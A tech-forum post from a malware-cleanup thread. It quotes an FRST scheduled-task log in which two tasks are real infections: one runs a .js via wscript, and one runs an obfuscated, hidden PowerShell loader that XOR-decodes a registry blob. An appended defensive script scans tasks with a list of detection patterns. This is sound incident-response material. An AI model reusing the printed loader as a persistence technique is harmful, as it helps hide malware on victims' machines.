Old 05.08.2023, 22:40   #1296
fre@k
Premium
Join Date: Oct 2008
Location: osijek
Posts: 1,860
Quote:
Originally Posted by domy_os
Any changes? With this you can disable the script host completely...

Code:
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
I don't see anything suspicious in the HJT log, but post the FRST logs as well...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.

Quote:
==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
So I googled all of them, but I don't know what this one is related to

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
__________________


CPU: I5 2500k
GPU: MSI TF 660 OC
MBO: Asrock Z68 PRO3
RAM: 2x4gb G. Skill (1333mhz)
PSU: Seasonic 620W
HDD: SSD 180gb Intel 520 | WD Green 2TB
CASE: CM Elite 370
Other: MX518, Logitech Ultra Flat, DELL U2412M, Hyper 212+



If your life is sad, don't worry! At least your salary is laughable
fre@k is offline
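Added example, not code from this thread or from FRST: a defender-side PowerShell script that first reports the Windows Script Host setting that domy_os's command writes (the registry value alone, under both HKLM and HKCU, since WSH honours either) and then walks the live scheduled tasks looking for the pattern visible in the two `Microsoft\Windows\...` tasks in the FRST log above, a script interpreter paired with an obfuscation or hidden-execution indicator. The function names and the indicator list are my own choices; run it from an elevated PowerShell session.

```powershell
# Added example, not code from the thread: audit the Windows Script Host setting
# and hunt scheduled tasks whose action launches a script interpreter together
# with an obfuscation indicator, as the two Microsoft\Windows\... tasks in the
# FRST log do. Function names and the indicator list are my own choices.

function Get-WshStatus {
    # WSH reads 'Enabled' from HKLM (machine-wide) and HKCU (per-user); 0 disables it.
    # An absent value means WSH is enabled, so report that explicitly.
    $paths = @(
        'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings',
        'HKCU:\SOFTWARE\Microsoft\Windows Script Host\Settings'
    )
    foreach ($p in $paths) {
        $v = (Get-ItemProperty -LiteralPath $p -Name Enabled -ErrorAction SilentlyContinue).Enabled
        if ($null -eq $v)  { $state = 'not set (WSH enabled)' }
        elseif ($v -eq 0)  { $state = 'disabled' }
        else               { $state = 'enabled' }
        [pscustomobject]@{ Path = $p; Enabled = $state }
    }
}

function Find-SuspiciousTasks {
    # Interpreters commonly used by task-based persistence, and argument patterns
    # that point at obfuscation or hidden execution. -match is case-insensitive,
    # which matters because the log line above mixes case to defeat naive greps.
    $interpreters = 'wscript\.exe|cscript\.exe|cmd\.exe|powershell\.exe|pwsh\.exe|mshta\.exe'
    $indicators = @(
        '\biex\b', 'invoke-expression', '\bicm\b', 'invoke-command',
        '-bxor', 'frombase64string', '\s-e(nc|c)?\s',
        'windowstyle\s+hidden', '-w\s+hidden',
        '\.js\b', '\.vbs\b', '\.wsf\b', '\.hta\b'
    )
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            if (-not $a.Execute) { continue }   # COM-handler actions have no Execute
            $cmdline = "$($a.Execute) $($a.Arguments)"
            $hits = @()
            if ($a.Execute -match $interpreters) { $hits += 'interpreter' }
            foreach ($pattern in $indicators) {
                if ($cmdline -match $pattern) { $hits += $pattern }
            }
            # cmd.exe or wscript.exe on its own is common in vendor updaters; only
            # report an interpreter paired with at least one further indicator.
            if (($hits -contains 'interpreter') -and $hits.Count -ge 2) {
                [pscustomobject]@{
                    Task    = $task.TaskPath + $task.TaskName
                    State   = $task.State
                    Author  = $task.Author
                    Command = $cmdline
                    Hits    = ($hits -join ', ')
                }
            }
        }
    }
}

Get-WshStatus | Format-Table -AutoSize
Find-SuspiciousTasks | Format-List
```

Against the log above, only the two flagged tasks would be reported: the `Microsoft\Windows\Live\025Mp7ajtIGb` task pairs wscript.exe with a `.js` file sitting in System32, and the `Management\Provisioning\JHTFCtmf\...` task pairs cmd.exe with `iex`, `icm`, `-bxor` and a hidden window; the Adobe, AMD, Corel and updater tasks produce no interpreter hit. Note what each control covers: setting WSH `Enabled` to 0 stops wscript.exe from running the `.js`, but it does nothing against the second task, which uses cmd.exe and PowerShell to decode a blob stored under the `Minnetonka audio software...` registry key, so the task entries themselves and that key are what an FRST fixlist would need to target.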